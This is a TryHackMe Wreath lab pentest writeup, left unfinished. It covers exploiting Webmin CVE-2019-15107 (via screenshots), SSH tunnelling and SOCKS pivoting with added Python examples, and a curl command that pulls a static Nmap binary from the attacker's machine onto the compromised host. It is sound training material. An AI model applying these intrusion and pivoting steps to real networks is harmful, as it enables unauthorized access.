Janberkb/Wreath_TryHackMe_Writeup
Wreath Network Pentest Report

📡 https://tryhackme.com/room/wreath

Network Analysis

  • There are three machines on the network.
  • There is a public-facing web server.
  • There is a self-hosted git server on the network.
  • There is a PC on the network that has antivirus installed (probably Windows).
  • The Windows PC cannot be reached directly from the public-facing web server. (To be verified.)

1-)Enumeration - Nmap Scan on 10.200.99.200

The Nmap scan includes:

  • TCP SYN Scan
  • Service Version Detection on Ports
  • Nmap Discovery Script
  • Port range 0-15000

Scan Results Summary

  • 4 ports are open and 1 port is closed:
    • 22/tcp open ssh OpenSSH 8.0 (Protocol 2.0)
    • 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
    • 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
    • 9090/tcp closed zeus-admin
    • 10000/tcp open http MiniServ 1.890 (Webmin httpd)
  • The web server runs on CentOS and the site is served by Apache.
  • The domain name is "thomaswreath.thm".
  • There is an e-mail address on the website (me@thomaswreath.thm).
  • There is an admin panel (Webmin) on port 10000.

Scan Output

Nmap Scan On 10.200.99.200

2-)Enumeration - Checking Services

  • Found a website on ports 80/443. (DNS is not configured, so the domain name has to be added to the /etc/hosts file.)
  • Found the website's admin panel, Webmin 1.890, which is vulnerable.
  • As the search result below shows, the vulnerability applies to 1.890 too.
  • (I just searched "webmin 1.890 vulnerability".)

(screenshot: Untitled.png)

  • It can be exploited through a remote command execution vulnerability.

3-)Finding Vulnerabilities and Exploiting

  • I wanted to check Python exploits first because I think they are easier.

(screenshot: Untitled 1.png)

  • There are lots of GitHub repos; let's check the first one.
  • It looks like it can execute Linux commands as the root user (Webmin itself runs as root, so whatever it executes runs as root). This means we can do anything on the box.
  • So of course we can use this command execution to spawn a reverse shell.
  • We could also read files this way, but it is not convenient.

(screenshot: Untitled 2.png)

  • There is another Python script that creates a reverse shell and connects back to us. That's what I was looking for.
  • CVE-2019-15107

(screenshot: Untitled 3.png)

  • Found an id_rsa file (SSH private key) and used it to connect over SSH.

(screenshot: Untitled 4.png)

  • Exploitation is done and no privilege escalation is needed because we are already connected as root.

4-)Pivoting

Pivoting is using one compromised machine to reach other machines in the network and get deeper. After compromising the public-facing server, you can reach the other machines with the techniques below.

Notes

For example:

(screenshot: Untitled 5.png)

Enumeration

Enumeration is collecting information and learning what kind of structure is in front of us. What methods can we use?

ifconfig

The ifconfig command shows interface information: how many interfaces the machine has and each one's IP address and netmask. (It does not show the default gateway; that comes from the routing table.) We are connected to the machine over SSH, so run it and look.

(screenshot: Untitled 6.png)

We have one Ethernet interface named "eth0" and nothing else.

When researching pivoting and enumeration techniques, I came across the arp -a command.

arp -a

The ARP table maps IP addresses to MAC addresses so the host knows which MAC owns which IP. Looking at the table shows which machines have communicated with this machine recently, with their MAC addresses and IPs. Note that only hosts on the same subnet show up here, because ARP works at layer 2. So run this command.

(screenshot: Untitled 7.png)

I can see that two machines have communicated with this machine recently. 10.200.99.1 is probably the gateway. The second machine could be the git server, because he said there is a local git server that he uses to update the website.

Checking the resolv.conf file

The resolv.conf file holds the DNS resolver settings; if you see a "nameserver" line followed by an IP, that IP is the DNS server.

DNS maps names to IP addresses. Instead of typing the IP of a website or machine, if you have a DNS server you can use, you just type the machine's name and the system resolves the IP from it. (Example: "google.com" is a domain name.)

Scanning with Nmap

If you want to run Nmap over SSH and it is not installed on that machine, you can copy a portable version of Nmap to the remote machine with scp:

scp [-i key_file] <local_file> <user@remote_machine_IP:destination_path>
-i: identity file (private key). If you authenticate with a password instead, leave it out.
scp -i id_rsa nmap-portable.zip root@10.200.99.200:/root/
Example Nmap scan:
/root/nmap-portable/run-nmap.sh -sS -sV -O 10.200.99.0/24

Proxychains & Foxyproxy

  • Let's see what a proxy is and how we can use it for pivoting.

What is Proxy?

In the simplest terms: when you want to reach somewhere, such as a website, you ask someone else to fetch it for you. If you cannot reach the site but that "someone" can, it fetches the site and passes it on to you. The website sees the proxy's address rather than yours, because the proxy is the one actually connecting to it.

For more technical information visit here.

Proxychains

We can use this tool to send a program's connections through the proxy host and port that we choose. You can read this to learn how to use and configure it. For example:

  • With a configuration line like "socks4 127.0.0.1 4242", every connection a program makes under proxychains is handed to the SOCKS proxy listening on that host and port, and the proxy opens the real connection for us.
  • To connect somewhere over telnet through the proxy I can use this command:
proxychains telnet 172.16.0.100 23
  • This telnet connection goes from my machine to the proxy on 127.0.0.1:4242, and from the proxy (for example an SSH dynamic forward on a pivot host) on to 172.16.0.100. The target sees the proxy's address, not mine.

Foxyproxy

This is a web browser extension; if we need to reach a web server through the proxy from the browser, we can use it.

SSH Tunnelling / Port Forwarding

SSH tunnelling is building a tunnel over an SSH connection. If you have SSH access to the machine you are attacking, you can create a tunnel through it and reach whatever that machine can reach in its network.

(screenshot: Untitled 8.png)

For more information visit here.

Basically, if we cannot reach the green server above, we ask the red server to reach it and show it to us. It is exactly like a tunnel: if you cannot get inside, you dig a tunnel to get inside 😉

Let's create an SSH tunnel as an example.

Imagine we are the blue machine above and have no access to the green server's web service, but we want to reach it. We have an SSH connection to the red server, and the red server can reach the green server's web service. Let's dig a tunnel through the red server to reach the green one. We forward our local port 8080 to 192.168.0.3:80 through 192.168.0.2:

ssh -L 8080:192.168.0.3:80 user@192.168.0.2 -fN
ssh -L <local_port_to_forward>:<target_IP>:<target_port> <ssh_username>@<pivot_IP> -fN
-L: local port forwarding
-f: go to the background once authenticated
-N: do not run a remote command, only forward the port

After this, http://127.0.0.1:8080 on our machine reaches the green server's port 80 through the red server.

Of course, we can also create an SSH SOCKS proxy (a dynamic port forward). Then we are not limited to a single forwarded port: we can point FoxyProxy at the proxy to reach web servers from the browser, and use proxychains to run other tools through it.

With the command below, set your proxy configuration to SOCKS on localhost:1337 and you can reach everything the SSH server can reach.

ssh -D 1337 user@192.168.0.2 -fN
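An added example for the proxychains and `ssh -D` sections, not code from the writeup: it performs by hand the SOCKS5 exchange that proxychains or FoxyProxy do against the listener `ssh -D 1337 ...` opens on 127.0.0.1:1337, then uses the resulting socket as if it were a direct TCP connection to the target. The proxy address, the 10.200.94.150:80 target and the HTTP/1.0 GET are assumptions taken from the writeup's setup; no SOCKS authentication is offered because OpenSSH's -D listener accepts none.

```python
"""SOCKS5 CONNECT through an `ssh -D` listener, done by hand.

Added example, not from the original writeup.  Assumes the SOCKS listener is on
127.0.0.1:1337 and the target is an IPv4 host reachable from the pivot."""
import socket
import struct

SOCKS_VERSION = 5
METHOD_NO_AUTH = 0
METHOD_NONE_ACCEPTABLE = 0xFF
CMD_CONNECT = 1
ATYP_IPV4 = 1
REPLY_TEXT = {
    0: "succeeded",
    1: "general SOCKS server failure",
    2: "connection not allowed by ruleset",
    3: "network unreachable",
    4: "host unreachable",
    5: "connection refused",
    6: "TTL expired",
    7: "command not supported",
    8: "address type not supported",
}


def greeting() -> bytes:
    """Client hello: VER=5, NMETHODS=1, METHODS=[no authentication]."""
    return bytes([SOCKS_VERSION, 1, METHOD_NO_AUTH])


def parse_method_reply(data: bytes) -> int:
    """Server picks one method: VER, METHOD.  0xFF means none of ours is accepted."""
    if len(data) != 2 or data[0] != SOCKS_VERSION:
        raise ValueError(f"not a SOCKS5 method reply: {data!r}")
    if data[1] == METHOD_NONE_ACCEPTABLE:
        raise ConnectionError("proxy accepts none of the offered auth methods")
    return data[1]


def connect_request(host: str, port: int) -> bytes:
    """CONNECT: VER, CMD=1, RSV=0, ATYP=1 (IPv4), DST.ADDR (4 bytes), DST.PORT (big-endian)."""
    return (bytes([SOCKS_VERSION, CMD_CONNECT, 0, ATYP_IPV4])
            + socket.inet_aton(host)
            + struct.pack("!H", port))


def parse_connect_reply(data: bytes) -> tuple:
    """Reply: VER, REP, RSV, ATYP, BND.ADDR, BND.PORT -> (status text, bind ip, bind port).
    OpenSSH answers a successful CONNECT with 0.0.0.0:0 as the bound address."""
    if len(data) < 10 or data[0] != SOCKS_VERSION:
        raise ValueError(f"not a SOCKS5 connect reply: {data!r}")
    if data[3] != ATYP_IPV4:
        raise ValueError("only IPv4 bind addresses are handled in this example")
    status = REPLY_TEXT.get(data[1], f"unknown reply code {data[1]}")
    return status, socket.inet_ntoa(data[4:8]), struct.unpack("!H", data[8:10])[0]


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    """recv() may return fewer bytes than asked for; SOCKS headers have fixed sizes."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def http_get_via_socks(target: str, port: int = 80, path: str = "/",
                       proxy=("127.0.0.1", 1337), timeout: float = 10.0) -> bytes:
    """What FoxyProxy does for one page: SOCKS5 handshake, CONNECT, then plain HTTP."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(greeting())
        parse_method_reply(_recv_exact(s, 2))
        s.sendall(connect_request(target, port))
        status, _, _ = parse_connect_reply(_recv_exact(s, 10))
        if status != "succeeded":
            raise ConnectionError(f"CONNECT {target}:{port} via pivot failed: {status}")
        # From here sshd on the pivot relays bytes to target:port; the target
        # sees the pivot's address as the client, not ours.
        s.sendall(f"GET {path} HTTP/1.0\r\nHost: {target}\r\n\r\n".encode())
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
        return b"".join(chunks)


if __name__ == "__main__":
    print(http_get_via_socks("10.200.94.150").decode(errors="replace")[:500])
```

The failure path matters as much as the happy one: a "connection refused" or "host unreachable" reply here is the pivot telling you it could not reach the target, which is the same information a filtered port scan gives, just for one port at a time.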

5-)Enumeration - Git Server

Let's use our new knowledge. We know that if a tool is not installed on the target, we can upload a static binary of the tool and use it there. So I started an HTTP server with Python to serve the static Nmap binary, and downloaded it from my machine onto the target, which can reach my machine.

(screenshot: Untitled 9.png)

I am serving the Wreath directory and downloading the tool on the target machine.

(screenshot: Untitled 10.png)

sudo python3 -m http.server 80    # serve the current directory over HTTP
curl <my_attacking_ip>/tools/Enumeration/Linux/nmap-Janberkb -o /tmp/nmap-Janberkb && chmod +x /tmp/nmap-Janberkb
# download nmap-Janberkb from <my_attacking_ip> into /tmp/ and make it executable

I am going to scan the network from the web server's point of view and see which hosts are up and which ports are open, using the static Nmap binary.

./nmap-Janberkb -sn 10.200.94.0/24 -oN scan-Janberkb
-sn: host discovery only, no port scan
-oN: save normal (text) output to the named file

(screenshot: Untitled 11.png)

We can see that 5 hosts are up.

(screenshot: Untitled 12.png)

There is a note saying that the hosts ending in .250 and .1 should be excluded because they are not part of the vulnerable network. So there are actually 3 hosts on the network. The .200 host is the one we exploited, so there are 2 more hosts to attack. Let's check their ports with Nmap.
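An added example covering both the arp -a / resolv.conf enumeration above and this host-discovery step; it is not the writeup's code. It turns the text those commands produce into one de-duplicated list of pivot targets, dropping the compromised host itself and the hosts the room says to ignore. The three inputs are constructed samples in the formats those commands print (addresses in the 10.200.94.0/24 range of the -sn scan), not captured output.

```python
"""Merge arp -a, /etc/resolv.conf and nmap -sn output into a pivot target list.

Added example, not from the original writeup; all sample inputs are constructed."""
import re
from typing import Dict, List, Set

# Constructed: Linux `arp -a` output as seen from the compromised web server.
ARP_SAMPLE = """\
? (10.200.94.1) at 02:6c:bf:a0:14:e3 [ether] on eth0
? (10.200.94.150) at 02:4e:15:a9:82:21 [ether] on eth0
? (10.200.94.77) at <incomplete> on eth0
"""

# Constructed: /etc/resolv.conf on the same host.
RESOLV_SAMPLE = """\
# Generated by NetworkManager
search thomaswreath.thm
nameserver 10.200.94.1
"""

# Constructed: `nmap -sn 10.200.94.0/24 -oN ...` normal output.
NMAP_SN_SAMPLE = """\
# Nmap 7.80 scan initiated as: nmap -sn 10.200.94.0/24 -oN scan
Nmap scan report for 10.200.94.1
Host is up (0.00039s latency).
Nmap scan report for 10.200.94.100
Host is up (0.00047s latency).
Nmap scan report for 10.200.94.150
Host is up (0.00041s latency).
Nmap scan report for 10.200.94.200
Host is up.
Nmap scan report for 10.200.94.250
Host is up (0.00050s latency).
# Nmap done at ...: 256 IP addresses (5 hosts up) scanned in 3.45 seconds
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"


def parse_arp(text: str) -> Dict[str, str]:
    """IP -> MAC for resolved entries.  '<incomplete>' entries are hosts this
    machine tried to reach but never heard back from, so they are skipped."""
    return dict(re.findall(r"\(" + IPV4 + r"\) at ([0-9a-f:]{17})", text, re.I))


def parse_resolv(text: str) -> List[str]:
    """nameserver IPs, ignoring comments and other directives."""
    servers = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def parse_nmap_sn(text: str) -> List[str]:
    """Hosts nmap reported up in -oN output.  Handles 'scan report for name (ip)'
    as well as bare IPs; a report line only counts if 'Host is up' follows it."""
    hosts, current = [], None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (?:.*\()?" + IPV4 + r"\)?\s*$", line)
        if m:
            current = m.group(1)
        elif line.startswith("Host is up") and current:
            hosts.append(current)
            current = None
    return hosts


def pivot_targets(arp: str, resolv: str, nmap_sn: str,
                  self_ip: str, exclude: Set[str]) -> Dict[str, Set[str]]:
    """Merge the three views into target -> {sources}, sorted by address.
    Hosts seen only in ARP are kept: they talk to the pivot even if they ignore probes."""
    seen: Dict[str, Set[str]] = {}
    for ip in parse_arp(arp):
        seen.setdefault(ip, set()).add("arp")
    for ip in parse_nmap_sn(nmap_sn):
        seen.setdefault(ip, set()).add("nmap")
    for ip in parse_resolv(resolv):
        seen.setdefault(ip, set()).add("dns")
    skip = set(exclude) | {self_ip}
    ordered = sorted(seen.items(), key=lambda kv: [int(o) for o in kv[0].split(".")])
    return {ip: src for ip, src in ordered if ip not in skip}


if __name__ == "__main__":
    targets = pivot_targets(ARP_SAMPLE, RESOLV_SAMPLE, NMAP_SN_SAMPLE,
                            self_ip="10.200.94.200",
                            exclude={"10.200.94.1", "10.200.94.250"})
    for ip, sources in targets.items():
        print(f"{ip:16} seen via {', '.join(sorted(sources))}")
```

Tagging each target with where it was seen is the useful part: a host in the ARP table but absent from the -sn results is one that talks to the pivot yet drops probes, which is worth a closer look rather than being written off.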

(screenshot: Untitled 13.png)

  • All ports on the .100 host are filtered.

(screenshot: Untitled 14.png)

  • These are the open ports on the .150 host.

We need to find out what server this is and what web application is running on the host. I will use an SSH tunnel for that.

(screenshot: Untitled 15.png)

I am using this command to open the tunnel with local port 1337 (a dynamic forward, since FoxyProxy will send its requests for the .150 host through it). So to reach the HTTP service on the .150 host I configure FoxyProxy in Firefox. The tunnel is up; now I will set up FoxyProxy.

(screenshot: Untitled 16.png)

Click the extension; if you don't have it, add it to your browser.

Go to Options and add the connection as shown above.

I forwarded my local port 1337, so that is the port to configure.

After that I can browse to http://10.200.94.150:80/.

(screenshot: Untitled 17.png)

I can see that GitStack is running on the host, and the page shows some other paths. Let's try them.

(screenshot: Untitled 18.png)

I went to http://10.200.94.150:80/gitstack and found an admin panel. I tried admin/admin but it didn't work :) So I need to find a vulnerability or try generic passwords. I will try vulnerabilities first because it is easier.

searchsploit gitstack

(screenshot: Untitled 19.png)

Not completed yet.
